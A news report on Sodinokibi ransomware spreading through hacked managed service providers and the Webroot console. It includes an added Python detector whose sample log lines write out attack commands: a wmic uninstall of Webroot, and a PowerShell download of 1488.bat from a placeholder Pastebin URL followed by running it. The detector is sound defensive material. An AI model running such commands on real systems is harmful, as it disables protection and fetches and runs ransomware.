Malicious actors behind Sodinokibi ransomware hacked MSPs to spread the malicious payload via the Webroot SecureAnywhere console
Threat actors behind Sodinokibi ransomware managed to hack into at least three managed service providers (MSPs) and used remote management tools to distribute the malware payload via the Webroot SecureAnywhere console. The news came to light when a Reddit user posted the revelation on the MSP message board.
Reports claim that Kaseya VSA was also affected by the compromise and was used to deliver Sodinokibi ransomware.
After the compromise, attackers managed to deploy a “1488.bat” script, which is very similar to the one used in GandCrab ransomware attacks and which also disabled the management console. In the Sodinokibi ransomware case, however, the source of the incident was compromised credentials rather than a software vulnerability.
Hackers breached the MSPs via Remote Desktop
According to findings by Kyle Hanslovan, CEO of security firm Huntress Lab, the hackers breached the MSPs' servers over a Remote Desktop connection and then elevated their privileges to administrator level, which let them uninstall security applications such as Webroot or ESET.
After disabling anti-malware software, the threat actors remotely connected to the MSPs' clients' machines that ran the Webroot SecureAnywhere console. This tool was then used to run PowerShell scripts and install the malicious Sodinokibi payload from a Pastebin page, which was removed immediately upon discovery (although a non-malicious version was posted on GitHub).
Based on the limited research conducted so far, Webroot appears to be the most likely target, since its console lets administrators download and execute files on managed machines remotely. Once hackers hijack it, infecting users with malware becomes a much easier task.
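The chain described above has several stages a defender can observe in process-creation telemetry: a security product being uninstalled, PowerShell being launched by the remote-management agent, a download from Pastebin, and the 1488.bat script being written or run. The following is an added example, not code from the article, Webroot or Huntress: a small detector that replays those stages over constructed log lines. The simplified key=value log format, the host names, the agent name rmm_agent.exe and the Pastebin URL are all assumptions or placeholders.

```python
"""Stage detector for the MSP-console ransomware chain (added example).

Each rule flags one visible stage of the chain; a host that trips two or
more rules is treated as showing the chain rather than a one-off event.
"""
import re

# Placeholder name for the remote-management console's endpoint agent;
# a real deployment would list the actual agent binaries it uses.
RMM_AGENTS = {"rmm_agent.exe"}
PASTE_SITE = re.compile(r"pastebin\.com", re.IGNORECASE)
SECURITY_PRODUCTS = re.compile(r"webroot|eset", re.IGNORECASE)

# Constructed sample process-creation events (not real logs from the incident).
# Fields: host, parent (parent image), image (started process), cmdline.
SAMPLE_EVENTS = [
    'host=WS01 parent=explorer.exe image=notepad.exe cmdline="notepad.exe C:\\Users\\a\\notes.txt"',
    'host=MSP-SRV1 parent=cmd.exe image=wmic.exe cmdline="wmic product where name=\'Webroot SecureAnywhere\' call uninstall"',
    'host=WS02 parent=rmm_agent.exe image=powershell.exe cmdline="powershell.exe -NoProfile -Command Invoke-WebRequest https://pastebin.com/raw/PLACEHOLDER -OutFile C:\\Windows\\Temp\\1488.bat"',
    'host=WS02 parent=powershell.exe image=cmd.exe cmdline="cmd.exe /c C:\\Windows\\Temp\\1488.bat"',
    'host=WS03 parent=rmm_agent.exe image=powershell.exe cmdline="powershell.exe -Command Get-Service"',
]

FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line):
    """Turn one key=value line into a dict; quoted values keep their spaces."""
    fields = {"host": "", "parent": "", "image": "", "cmdline": ""}
    for key, value in FIELD.findall(line):
        fields[key] = value.strip('"')
    return fields


def powershell_from_rmm(e):
    # PowerShell started by the management agent: normal for admins, but the
    # launch point used in this chain, so it counts as one stage.
    return e["image"].lower() == "powershell.exe" and e["parent"].lower() in RMM_AGENTS


def paste_site_download(e):
    return PASTE_SITE.search(e["cmdline"]) is not None


def known_script_1488_bat(e):
    # Script name reported for this campaign and the earlier GandCrab attacks.
    return "1488.bat" in e["cmdline"].lower() or e["image"].lower() == "1488.bat"


def security_tool_removal(e):
    cmd = e["cmdline"].lower()
    return "uninstall" in cmd and SECURITY_PRODUCTS.search(cmd) is not None


RULES = [powershell_from_rmm, paste_site_download,
         known_script_1488_bat, security_tool_removal]


def detect(lines):
    """Return {host: set(rule names)} for every host that trips at least one rule."""
    findings = {}
    for line in lines:
        event = parse_event(line)
        hits = {rule.__name__ for rule in RULES if rule(event)}
        if hits:
            findings.setdefault(event["host"], set()).update(hits)
    return findings


def hosts_with_chain(findings, min_stages=2):
    """Hosts on which at least `min_stages` distinct stages were seen."""
    return sorted(h for h, hits in findings.items() if len(hits) >= min_stages)


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for host, hits in sorted(found.items()):
        print(f"{host}: {', '.join(sorted(hits))}")
    print("chain suspected on:", hosts_with_chain(found))
```

On the sample input, WS03 trips only the RMM-launched PowerShell rule, which is ordinary administration and should not alert by itself; WS02 trips three stages and is the host worth escalating. In practice the same rules would be fed from Sysmon or EDR process-creation events rather than constructed lines.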
Webroot is forcing its customers to enable two-factor authentication to protect them from ransomware infection
In response to the incident, Webroot began messaging its customers, stating that “a small number” of users were impacted by the hack and that the company is working on remediating the situation and ensuring their online safety.
In the e-mail that users received, Webroot stated that it is forcibly enabling the two-factor authentication feature for all customers to prevent any further compromise:
Recently, Webroot's Advanced Malware Removal team discovered that a small number of customers were impacted by threat actors who could have been thwarted with more consistent cyber hygiene. We immediately began working with those customers to remediate any impact.
As a proactive measure to help ensure all our customers are following security best practices, we initiated an automated console logoff at 3 a.m. EDT on June 20 and are implementing mandatory 2FA in the Webroot Management Console.
While Sodinokibi ransomware is a relatively new threat (it was first spotted by security experts at the end of April 2019), this is not the first time its authors have used managed service providers and their remote management tools to infect customers with the malware.
The affected Webroot users are now being forced to enable the 2FA function, but this does not mean that similar attacks cannot happen on other consoles.